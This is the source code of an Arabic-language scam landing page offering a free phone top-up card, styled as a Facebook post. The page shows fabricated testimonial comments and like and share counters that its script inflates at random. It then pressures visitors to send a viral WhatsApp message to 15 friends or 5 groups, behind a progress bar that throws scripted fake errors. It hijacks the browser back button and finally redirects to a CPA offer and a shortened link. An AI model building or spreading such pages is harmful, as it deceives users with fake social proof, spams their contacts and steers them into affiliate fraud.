<!DOCTYPE html><html><head>
</head><body><img src="images/rC1Bkug.png" width="100%">

        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>بطاقة شحن مجانا</title>
        <meta name="theme-color" content="#ffffff">
        <link rel="stylesheet" href="css/font-awesome.min.css">




<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("css/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: bold;
    box-sizing: border-box;


}
body {
    direction: rtl;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #ff0126;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 18px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #27ae60;
    transition: background 0.3s ease;
}
button:hover {
    background: #025ce3;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #006940;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #006940;
}
#fill,
#fill2 {
    background: #006940;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #006940;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
</style>  
  
    <div class="post">

        <div id="intro">
            <p class="welcome">
        </p></div>
        <div id="loader">
                    <center><img src="images/PnAlp01.gif" class="Center" style="
    width: 60px;
"></center>
            <div>الرجاء الإنتظار ...</div>
          <img src="images/aUWsB0U.gif" alt="Win" style="width: 340px;">

        </div>
        <div id="info">
            <p class="title"></p>

            <div class="phone">
                <button id="confirm">إرسال</button>
            </div>
            <p class="error">المرجو ادخال رقم صحيح مثال ( 07XXXXXXXX ) !</p>
        </div>
        <div id="checking">
            <p class="title">جاري التحقق من الرقم</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
            <center><img src="images/nXAp5Wp.png" alt="Win" style="width: 340px;"></center>
             <p class="tip">تهانينا لك !!</p>
            <p class="tip">
                لقد كسبت كارت شحن المصرية للاتصالات بقيمة <span class="amount">100 جنيه</span>
            </p><br>
            <p class="tip">يمكنك الحصول على الكارت بعد اتباع الخطوات التالية : </p><br>
            <p class="tip">1 - إضغط على زر "دعوة" الموجود فى الأسفل وارسل الرسالة الى 15 صديقا او 5 مجموعات على الواتساب، ليستطيعو بدورهم الاستفادة من هذا العرض.</p>
            <p class="tip">2 - سوف يتم كشف رقم الكارت بالكامل فوراً بعد ملئ شريط التحقق الأخضر بالأسفل</p>

            <button id="whatsapp">دعوة</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">يمكنك الحصول على الكارت</p>
            <button id="offer">اضغط هنا</button>
 

        </div>
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://www.facebook.com/reaction/image/1635855486666999/?size=20&scale=1"> <img class="love" src="https://www.facebook.com/reaction/image/1678524932434102/?size=20&scale=1"> <img class="care" src="https://www.facebook.com/reaction/image/613557422527858/?size=20&scale=1"> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    <img src="images/sfUirIR.jpg">
                    <div class="single-container">
                        <span class="user">مريم حسين</span>
                      

                        <span class="text">
 شكرا على المصداقية  حصلت على كارت شحن بـ 100 ريال                       </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://lh3.googleusercontent.com/proxy/wcYLTy0gfkfnbgpb4rK1-_wy_qF0IflebcPwIB86oi4G_HTGG5wOx0zH0ptUCzqR5U4=s0-d">
                    <div class="single-container"><span class="user">فاطمة محمد</span> <span class="text">رأيت فعلا هذا الإعلان مرة وإعتقدت انه كذب وقد رأيت هذا الإعلان مرة أخرى ، وقررت أن أحاول التجربة لأني كنت أشعر بالملل ... ولقد حصلت فعلا بطاقة شحن محمول بـ 100 ريال . شكرا على المصداقية
 </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://lh4.googleusercontent.com/proxy/-jHxciCB7-Ygh6arexQlZ3RYlzp9vs3olEn6o4dmGjUWbt25oRU4WCHbYXq93umKCIM=s0-d">
                    <div class="single-container"><span class="user">علي احمد</span> <span class="text">اقسم بالله حصلت على بطاقة شحن 100 ريال شكرااااا رمضان كريم</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://lh4.googleusercontent.com/proxy/raefGWE_CL211tRT-WRUCiBZe8j2EQu44CdJWrNJLQs7CFpGOTOFblTVWWDhF9N4E0I=s0-d">
                    <div class="single-container"><span class="user">هشام الماجد</span> <span class="text">❤️ شكرا حصلت على بطاقه شحن 100 ريال عيد مبارك لكم</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..."></div>
            </div>
        </div>
    </div>
<!-- ODcompany -->
    <script src="js/jquery-latest.min.js"></script>
    <script type="text/javascript">
        !(function () {
            var psy;
            try {
                for (psy = 0; 10 > psy; ++psy) history.pushState({}, "", "");
                onpopstate = function (psy) {
                    psy.state && alert("انتظر الحصول على الكارت ...");
                };
            } catch (o) {}
        })();
    </script>
<!-- JS-FB -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>
<!-- JS-FB -->    
<!-- JS-MAIN -->
<script type="text/javascript">

$("#go").ready(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#share").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 0) {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 1000);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>
<!-- JS-MAIN -->


  
    <script>
        var text1 = "",
            text2 = "%0A",
            link = "بمناسبة عيد الفطر بسرعة *ياااجماعة* بطاقات شحن الهاتف  مجانا لجميع شركات الاتصالات في المملكة، وربنا انا كسبت دلوقتي *بطاقه شحن بـ 100 ريال* و 5 من صحابي كسبو بسرعة شوف حظك قبل متخلص  بطاقات الشحن 💳 من هنا : https://is.gd/77dkHr",
            error = "هناك خطأ!\nالمشاركات غير محسوبة ربما شاركته مع نفس الصديق او المجموعة اكثر من مرة، من فضلك اعد المشاركة.",
            cpa = "https://ksa-phone.pages.dev/",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + link;
    </script>

<script>
<!-- code by ODcompany -->
  <!-- JS -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});  
  
</script>
<script type="text/javascript">  
var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $(".welcome").fadeOut(0);
    $(".step1").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 2;
    } else if (width == 82) {
        width += 2;
    } else if (width == 84) {
        width += 2;
    } else if (width == 86) {
        width += 2;
    } else if (width == 88) {
        width += 2;
    } else if (width == 90) {
        width += 1;
    } else if (width == 91) {
        width += 3;
    } else if (width == 94) {
        width += 1;
    } else if (width == 95) {
        width += 1;
    } else if (width == 96) {
        width += 1;
    } else if (width == 97) {
        width += 1;
    } else if (width == 98) {
        width += 1;
    } else {
            window.location.href = "https://smrturl.co/8da638d";
  
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});  
</script>  
<!-- JS-WP --> 

 

  <!-- Global site tag (gtagش.js) - Google Analytics -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-152330835-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-152330835-1');
</script>

</body></html>